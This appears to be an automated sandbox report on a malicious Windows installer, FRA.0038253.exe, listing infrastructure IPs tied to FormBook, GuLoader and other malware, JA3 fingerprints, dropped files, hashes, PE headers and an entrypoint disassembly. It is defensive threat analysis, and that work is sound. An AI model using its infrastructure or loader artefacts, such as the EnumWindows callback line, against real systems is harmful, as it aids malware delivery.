                                                            https://rstgmbh-rstsrl.start.pageGet hashmaliciousHTMLPhisherBrowse
                                                            • 69.164.216.107
                                                            http://178.79.157.214Get hashmaliciousUnknownBrowse
                                                            • 178.79.157.214
                                                            Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                                            • 172.104.187.4
                                                            ansrnotificacaonova.msiGet hashmaliciousUnknownBrowse
                                                            • 173.255.201.196
                                                            http://selliliar.liveGet hashmaliciousUnknownBrowse
                                                            • 45.79.137.127
                                                            v7TyOVoRvK.exeGet hashmaliciousAsyncRATBrowse
                                                            • 172.105.121.169
                                                            Oyb2Fuc3Qv.exeGet hashmaliciousXWormBrowse
                                                            • 172.105.121.169
                                                            ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            APR0927,24.docGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            AS-REGRUSSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            Payment invoice.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            quote.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 31.31.196.77
                                                            OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 194.58.112.174
                                                            SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            http://www.rms.msk.ruGet hashmaliciousUnknownBrowse
                                                            • 194.67.105.38
                                                            Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 37.140.192.90
                                                            file.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            SecuriteInfo.com.PUA.Tool.Linux.BtcMine.4274.18395.31150.elfGet hashmaliciousXmrigBrowse
                                                            • 194.87.106.49
                                                            CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCwaybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            https://mte-reguje.onrender.com/?scn=29023&ble=statistics&em=314387306_160807Get hashmaliciousPhisherBrowse
                                                            • 47.254.144.66
                                                            zDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                            • 47.88.168.114
                                                            fa10576.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 47.243.134.243
                                                            SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                                            • 47.88.4.215
                                                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                            • 47.243.134.243
                                                            loader.exeGet hashmaliciousCobaltStrikeBrowse
                                                            • 8.219.94.174
                                                            loader.exeGet hashmaliciousCobaltStrikeBrowse
                                                            • 8.219.94.174
                                                            setup#U67e5#U8be2#U7248.exeGet hashmaliciousUnknownBrowse
                                                            • 47.75.18.205
                                                            setup#U67e5#U8be2#U7248.exeGet hashmaliciousUnknownBrowse
                                                            • 47.75.18.205
                                                            VNPT-AS-VNVNPTCorpVNSSDQ115980924.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 203.161.49.193
                                                            NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.227
                                                            d35g770B2W.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.228
                                                            Lcjfuguruhxhrv.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                            • 203.161.43.227
                                                            Purchase Order_17052024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 203.161.43.227
                                                            URGENT BANK ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.227
                                                            Purchase Order_21052024.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.227
                                                            m735YSFaZM.exeGet hashmaliciousFormBookBrowse
                                                            • 203.161.43.227
                                                            zDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                            • 14.232.212.170

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            37f463bf4616ecd445d4a1937da06e19Factura_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            file.exeGet hashmaliciousVidarBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            101764ZAM2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            file.exeGet hashmaliciousVidarBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206
                                                            SecuriteInfo.com.Win64.DropperX-gen.22747.2720.exeGet hashmaliciousUnknownBrowse
                                                            • 142.251.33.97
                                                            • 142.250.69.206

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dllDOC.rarGet hashmaliciousGuLoaderBrowse
                                                              DOC.rarGet hashmaliciousGuLoaderBrowse
                                                                Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Twrchtrywth.exeGet hashmaliciousGuLoaderBrowse
                                                                    Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      Transferencia.exeGet hashmaliciousGuLoaderBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\Chott151.pro

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):642577
                                                                        Entropy (8bit):0.15688102212856736
                                                                        Encrypted:false
                                                                        SSDEEP:384:1CThvb6qpJM51+qDtHndoq9zMhjBH8S/mIB3mtOLjsC/gz+8U/jLco4zNsO2MTiz:nlQQKmtJULsNsODkxV
                                                                        MD5:CDCEC2C558FA8A8E63AA5356507265B3
                                                                        SHA1:69423E82B8C5A9CE561BE425DE34E38FD348246E
                                                                        SHA-256:E85B367006F230C3B2E29A11766CDA65A0582F9EAB4A601BDECEA7229B26D0FC
                                                                        SHA-512:B01517DAC0CE0B0320A6889FD9E1C385731DE8713677003FCDDC020ADD8B2E70126EF9711D63172B58B6EF7911629FDFFFD0E290B021FFE2D7AB4BD439345122
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:................................................................................................................................................................................................................................................................................................H................................................................../........................................................................m................................................................................"......................................................................................................................................................................................................8...................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\Majesttiske.Tys

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):383244
                                                                        Entropy (8bit):7.626599650795766
                                                                        Encrypted:false
                                                                        SSDEEP:6144:cigWKNgKbYNLysMPuFNecKbNsG6MnH2sH4le5xx567Tl9QoJ06T6r4l:cOKNcCPQKb+Gxn17jKTldWu6Ul
                                                                        MD5:364A269FD74434764B105B858C744A25
                                                                        SHA1:165011DD3CD6BF08689CD1ADCA49B709540FB90A
                                                                        SHA-256:4CED9FD0F138C541F54922E81E96EDAB706803AC5A69356D02A0DEAB5F632224
                                                                        SHA-512:69FF9E7214850BB5C9B4978F0C15FB08296C1ABBC025C0260C6E500B156FACFABCCACED1CF9FAFEED55BB484DB6443CD85DD7AD507B8C892F493E76B21C0FB73
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:........(((...............a.$$$...}}.rrrrrr..GGG..2...................hh...........AAAAA...............bb.................rrrrrr.==.............999........11..............rr.................uu......ww.................hh............................DD.{{.......VV..........................ss............L.UUU.. ....m..G.......{............n.............111...y.....~~~...9......,..............@.............................aa...00.......................ggggg......H.........II............YY.........ffff.kkk...FF......666..............##.....v.}.......0......t.DDD..<<.........,,.....................................................444.v............000000............................s.................I............*.888.!!!!............................n.}.....WW.I.....2.....................I...;.2.........0..............w...................ii...............H.......................&.......................//.y.J.....C..........MMMM.......dd.....=..........................FF.........LLLLL............

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\Sponsible.gum

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1265190
                                                                        Entropy (8bit):0.15959484718224348
                                                                        Encrypted:false
                                                                        SSDEEP:768:HC2H0KZapOXkkuEb/eLGdJoyr9XAtNK5i62zCxT7ciI4m:l9
                                                                        MD5:15D9EACEF1E85CF33B6BDA50A20BB952
                                                                        SHA1:F970803C1192FC9E74F54F23124EA401522C70E1
                                                                        SHA-256:9E381E8BE66B5E4B91462ED8FB919409595EB718E600F4327D864743EC899DDE
                                                                        SHA-512:705783CF4E7CD5CDB33277F60994D8A60C977990D7615EE8C1EA9A52A452F043D3FFFCE0D8AD3999E80F8DF15A3350272E87E34B244A9FD780FD925A40CB966B
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:...........................................................................................................................................................................................................................P...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.........................$...............................................................................................................M................................-.............................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\aromatiseres.kny

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1065541
                                                                        Entropy (8bit):0.15989812624905142
                                                                        Encrypted:false
                                                                        SSDEEP:768:YBQpe8ptpsXQPCNuvNyZVS83SVKpUQmRhFJzdEqQgapTQVNvW:LtM
                                                                        MD5:8A71483589E505B551DAB3E14CAECF9F
                                                                        SHA1:D0FA3D65A453D2C274F3FA6C3318BD28DD34CD35
                                                                        SHA-256:DCA1DCEFB8B08F47A8D82F1135F1B6E6EDFFDB70930A1227676EC4F7A1D9502A
                                                                        SHA-512:9672A5C5D04FCA5FB5D9195CAEE4CDE23E27778069586C6D2CC28C649E9D63CF176FFDCC0D8DF77B10192C2D058CA17CCED76AC993E18C1F02C602FCFD6D4809
                                                                        Malicious:false
                                                                        Preview:.............................................................................................................................................................................................................................................................................................................)..........$...........................................r.............................................................................................................................................................................................2.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\contraproposal.ber

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):691600
                                                                        Entropy (8bit):0.16049501893639687
                                                                        Encrypted:false
                                                                        SSDEEP:384:ilBG9dPPlcRudyhsEJ3u1j8qiNRLMH1VRJ0sx3ldd6z83v7rXDvUE0uGavEy0m2y:h97ohs11QnNu53/rvDvR0y7u+GheAd2
                                                                        MD5:A9E2CB65CC04E6C0F54609FB8B7CC0A4
                                                                        SHA1:159D40F96A5C58DD7FE2D93D2CFBE22E13EF530A
                                                                        SHA-256:06AABA7BFAE63698E760B60D9C7CAD5C8A5A4A85595153C90C306A61C47A20F7
                                                                        SHA-512:E35545502071C3870BEF25277BE7DAF509F52D087CDBC600917794580BBFFCA48A439289F887F6B65C7D245DBDC7FEC239714B6E2794140B7B71F3E54A66AACA
                                                                        Malicious:false
                                                                        Preview:............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0....................................................................................................................................................$..............................................................................................................................................................................................................................................................R.......................................................................................

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek\overelaborates.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):465
                                                                        Entropy (8bit):4.2798744576617676
                                                                        Encrypted:false
                                                                        SSDEEP:12:qzwPKeCdBPOQWLuNM32fXE9APJBE3uKCMJ5JqXLSKOt:quCdBUuNDUGJBwNqX3g
                                                                        MD5:A351FC586F6D81C2D14B8ED97FA675FE
                                                                        SHA1:699ECB3F5C9409026082F83AD4F040151D285DB1
                                                                        SHA-256:94D29FE8A4B016CB3AB9B3134B49911795198B3E1C16DF0D16E3C8F7B45ED2FE
                                                                        SHA-512:A023DF771D677AC64EC5AE718229552379AB3EC037B92CE5ACC7CA56320ADF94D1EED0A37599ADC6D595F38293FC0FFACB20DED5D55A95C47C797CCC518B9D3F
                                                                        Malicious:false
                                                                        Preview:uranothallite deputationernes soundful.unliftable nihility glycogenizes landshold indtgtsnedgangens croakiest indkrslerne rokken superadequateness whickers skrumpenyres noncorruption..spectacled scapha acronyc headpin.arborous eternittens veridity.tilordningernes otteren dielectrics odourless unseveredly ledsagefnomeners reconsigns miltonian udgravningsfelt..dialogformers mordvinian afskumningens haemoglobinuria rosemaling forsigtigpakkers skillerum mesomorph..

                                                                        C:\Users\user\AppData\Local\Temp\802G22IQD

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\runas.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):188416
                                                                        Entropy (8bit):0.9926780404836638
                                                                        Encrypted:false
                                                                        SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                        MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                        SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                        SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                        SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......\...........:......................................................f............\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Settings.ini

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):48
                                                                        Entropy (8bit):4.78778203183594
                                                                        Encrypted:false
                                                                        SSDEEP:3:iGAIEXrcAQLQIfLBJXmgxv:lAIccAQkIP2I
                                                                        MD5:F5FDC9A00B0149608E24C58FD5249EA4
                                                                        SHA1:E2D50A7CDC8E7A9F9CC9F86074AE23F86A32F841
                                                                        SHA-256:12D2CA5CF65237CE9AC610E3A80AD20135A76D7E62C1FD92DED6CEA68F774C7C
                                                                        SHA-512:178DFAB68C39D0D58650B5AEECB702002E82683CD44777920AD884DA89C31BBD1164345CF7F1EC11CD851A249CB4CD7DA0C546C048AADB47F00B7A21304BC7F4
                                                                        Malicious:false
                                                                        Preview:[Access]..Early=user32::EnumWindows(i r1 ,i 0)..

                                                                        C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):5.744994954995265
                                                                        Encrypted:false
                                                                        SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                                                        MD5:12B140583E3273EE1F65016BECEA58C4
                                                                        SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                                                        SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                                                        SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: DOC.rar, Detection: malicious, Browse
                                                                        • Filename: DOC.rar, Detection: malicious, Browse
                                                                        • Filename: Twrchtrywth.exe, Detection: malicious, Browse
                                                                        • Filename: Twrchtrywth.exe, Detection: malicious, Browse
                                                                        • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                        • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.630677995866131
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:FRA.0038253.exe
                                                                        File size:587'552 bytes
                                                                        MD5:b07b3994ad66a39937d9081eb64cd5f5
                                                                        SHA1:3fffe0fb2721f440909f99c5cb74d1d556ac45bb
                                                                        SHA256:53501f12261fc6003fb771379846bfc0bad23e331f0ccde984c431c22901881f
                                                                        SHA512:43c7d08528c57467054c69c7d2b007662f618604abb465d92b1118dff290d0cb0bc8b2458ef35ae93fbc4d4b2f5527c298c350fc7743a21eacd548bd5f02d6e5
                                                                        SSDEEP:6144:KcBvWsKG0/FZuK1JnKr4AlEhZmqUH1o0TLIaGWDwiyPAw9RyJqIZRSNQABuX+rVy:nKFZ1exehZmNHKyrwLpaJlZrf+r0
                                                                        TLSH:69C40201F17DC8EAD8B452F38C1EE86031A26E6CA4E1F60E75E23B1D56B3353059B64E
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................d...........3............@

                                                                        File Icon

                                                                        Icon Hash:98cc663309010100

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4033a2
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x660843F1 [Sat Mar 30 16:55:13 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:671f2a1f8aee14d336bab98fea93d734

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:E=Undercurved@Kuppelen.bl, O=Professionelleste, OU="Torso Samboerne ", CN=Professionelleste, L=Metebach, S=Th\xfcringen, C=DE
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 02/03/2024 06:44:54 02/03/2027 06:44:54
                                                                        Subject Chain
                                                                        • E=Undercurved@Kuppelen.bl, O=Professionelleste, OU="Torso Samboerne ", CN=Professionelleste, L=Metebach, S=Th\xfcringen, C=DE
                                                                        Version:3
                                                                        Thumbprint MD5:EF6A6C58A09B4F796BD7007EEB81795D
                                                                        Thumbprint SHA-1:5EAF3DAA7A9675B3F073379AE20D879B94C27561
                                                                        Thumbprint SHA-256:0E276812D69ACFD0F2973154F311587C966AA67A4A33E05A960BD634DD46E079
                                                                        Serial:066BCF730A6BFE7957DEDAC7727E526A29B7FC1B

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 00000224h
                                                                        push esi
                                                                        push edi
                                                                        xor edi, edi
                                                                        push 00008001h
                                                                        mov dword ptr [ebp-14h], edi
                                                                        mov dword ptr [ebp-0Ch], 0040A188h
                                                                        mov dword ptr [ebp-08h], edi
                                                                        mov byte ptr [ebp-04h], 00000020h
                                                                        call dword ptr [0040809Ch]
                                                                        mov esi, dword ptr [004080A0h]
                                                                        lea eax, dword ptr [ebp-000000C4h]
                                                                        push eax
                                                                        mov dword ptr [ebp-000000B0h], edi
                                                                        mov dword ptr [ebp-30h], edi
                                                                        mov dword ptr [ebp-2Ch], edi
                                                                        mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                        call esi
                                                                        test eax, eax
                                                                        jne 00007F72B8AA15D1h
                                                                        lea eax, dword ptr [ebp-000000C4h]
                                                                        mov dword ptr [ebp-000000C4h], 00000094h
                                                                        push eax
                                                                        call esi
                                                                        cmp dword ptr [ebp-000000B4h], 02h
                                                                        jne 00007F72B8AA15BCh
                                                                        movsx cx, byte ptr [ebp-000000A3h]
                                                                        mov al, byte ptr [ebp-000000B0h]
                                                                        sub ecx, 30h
                                                                        sub al, 53h
                                                                        mov byte ptr [ebp-2Ah], 00000004h
                                                                        neg al
                                                                        sbb eax, eax
                                                                        not eax
                                                                        and eax, ecx
                                                                        mov word ptr [ebp-30h], ax
                                                                        cmp dword ptr [ebp-000000B4h], 02h
                                                                        jnc 00007F72B8AA15B4h
                                                                        and byte ptr [ebp-2Ah], 00000000h
                                                                        cmp byte ptr [ebp-000000AFh], 00000041h
                                                                        jl 00007F72B8AA15A3h
                                                                        movsx ax, byte ptr [ebp-000000AFh]
                                                                        sub eax, 40h
                                                                        mov word ptr [ebp-30h], ax
                                                                        jmp 00007F72B8AA1596h
                                                                        mov word ptr [ebp-30h], di
                                                                        cmp dword ptr [ebp-000000C0h], 0Ah
                                                                        jnc 00007F72B8AA159Ah
                                                                        and word ptr [ebp+00000000h], 0000h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x1b538.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8e2b00x1470
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x628a0x6400c4a2423b5674bfa0f784f8a541b55665False0.6612109375data6.390159547186612IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x80000x12340x1400d169790bd6b8e7821b264cddc934c496False0.4265625data5.032486821165516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0xa0000x1a4380x400c8ea57e3d910ccbc8ce8b96488c46e9bFalse0.6474609375data5.255785049642427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata0x250000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x400000x1b5380x1b600fa34ad7509cc085bd2197e1a639b3094False0.3632544948630137data4.846472284247547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x402f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1387229386016799
                                                                        RT_ICON0x50b200x5d0ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9915624212912434
                                                                        RT_ICON0x568300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.26047717842323653
                                                                        RT_ICON0x58dd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3067542213883677
                                                                        RT_ICON0x59e800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.37745901639344265
                                                                        RT_ICON0x5a8080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4698581560283688
                                                                        RT_DIALOG0x5ac700x100dataEnglishUnited States0.5234375
                                                                        RT_DIALOG0x5ad700x11cdataEnglishUnited States0.6056338028169014
                                                                        RT_DIALOG0x5ae900xc4dataEnglishUnited States0.5918367346938775
                                                                        RT_DIALOG0x5af580x60dataEnglishUnited States0.7291666666666666
                                                                        RT_GROUP_ICON0x5afb80x5adataEnglishUnited States0.7888888888888889
                                                                        RT_VERSION0x5b0180x1e0dataEnglishUnited States0.5354166666666667
                                                                        RT_MANIFEST0x5b1f80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                        Imports

                                                                        DLLImport
                                                                        ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                                                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                                                        ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                                                        COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                        USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                                                                        GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
